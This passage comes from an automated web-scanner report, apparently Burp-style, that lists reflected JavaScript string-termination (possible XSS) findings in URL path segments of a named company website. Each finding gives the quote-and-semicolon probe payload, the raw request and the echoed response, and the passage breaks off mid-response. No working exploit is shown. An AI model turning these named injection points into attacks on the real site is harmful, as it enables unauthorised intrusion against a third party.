1.3. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 164ab'%3bf28adc8d829 was submitted in the REST URL parameter 1. This input was echoed as 164ab';f28adc8d829 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium164ab'%3bf28adc8d829/products/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:06 GMT
Content-Type: text/html
Content-Length: 21466
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium164ab';f28adc8d829/products/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.4. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd738"%3b7f057f5a9e7 was submitted in the REST URL parameter 1. This input was echoed as fd738";7f057f5a9e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Mediumfd738"%3b7f057f5a9e7/products/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21466
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Mediumfd738";7f057f5a9e7/products/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.5. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56975"%3bb35bb28a897 was submitted in the REST URL parameter 2. This input was echoed as 56975";b35bb28a897 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products56975"%3bb35bb28a897/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21696
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products56975";b35bb28a897/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.6. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a553e'%3b46a05cb868f was submitted in the REST URL parameter 2. This input was echoed as a553e';46a05cb868f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/productsa553e'%3b46a05cb868f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21694
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/productsa553e';46a05cb868f/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.7. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51566'%3b5cc3f61f373 was submitted in the REST URL parameter 1. This input was echoed as 51566';5cc3f61f373 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium51566'%3b5cc3f61f373/products/itinfrastructure/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:48 GMT
Content-Type: text/html
Content-Length: 42685
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Medium51566';5cc3f61f373/products/itinfrastructure/computing/caas_smb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.8. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f91e"%3b44be4195806 was submitted in the REST URL parameter 1. This input was echoed as 1f91e";44be4195806 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium1f91e"%3b44be4195806/products/itinfrastructure/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21538
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium1f91e";44be4195806/products/itinfrastructure/computing/caas_smb/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FO
...[SNIP]...

1.9. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 569d6"%3b3b43c54ad1a was submitted in the REST URL parameter 2. This input was echoed as 569d6";3b43c54ad1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products569d6"%3b3b43c54ad1a/itinfrastructure/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products569d6";3b43c54ad1a/itinfrastructure/computing/caas_smb/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDA
...[SNIP]...

1.10. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f28a'%3b940680195e9 was submitted in the REST URL parameter 2. This input was echoed as 4f28a';940680195e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products4f28a'%3b940680195e9/itinfrastructure/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/products4f28a';940680195e9/itinfrastructure/computing/caas_smb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.11. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 898db"%3b1665125aa22 was submitted in the REST URL parameter 3. This input was echoed as 898db";1665125aa22 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure898db"%3b1665125aa22/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products/itinfrastructure898db";1665125aa22/computing/caas_smb/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.12. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81674'%3ba29f40094fd was submitted in the REST URL parameter 3. This input was echoed as 81674';a29f40094fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure81674'%3ba29f40094fd/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21768
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/products/itinfrastructure81674';a29f40094fd/computing/caas_smb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.13. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40f03"%3b15f8384ea5a was submitted in the REST URL parameter 4. This input was echoed as 40f03";15f8384ea5a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure/computing40f03"%3b15f8384ea5a/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
;//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products/itinfrastructure/computing40f03";15f8384ea5a/caas_smb/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.14. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71d5f'%3be418c831cb5 was submitted in the REST URL parameter 4. This input was echoed as 71d5f';e418c831cb5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure/computing71d5f'%3be418c831cb5/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:01 GMT
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/products/itinfrastructure/computing71d5f';e418c831cb5/caas_smb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.15. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce7a7"%3b3fec95ae7a4 was submitted in the REST URL parameter 5. This input was echoed as ce7a7";3fec95ae7a4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure/computing/caas_smbce7a7"%3b3fec95ae7a4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:17 GMT
Vary: User-Agent
